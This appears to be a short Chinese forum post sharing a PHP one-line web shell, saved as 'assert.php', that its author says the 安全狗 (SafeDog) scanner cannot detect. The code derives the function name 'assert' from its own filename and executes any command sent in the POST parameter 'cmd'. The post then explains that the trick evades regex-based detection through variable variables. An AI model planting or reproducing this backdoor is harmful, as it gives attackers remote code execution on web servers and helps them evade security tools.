无聊写了个简单但是安全狗查不出的一句话后门
:/

文件名:assert.php
代码:
<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);

链接密码:cmd

本质上这个一句话后门就是利用了检测引擎在正则匹配时候对可变变量检测能力的不足绕过检测。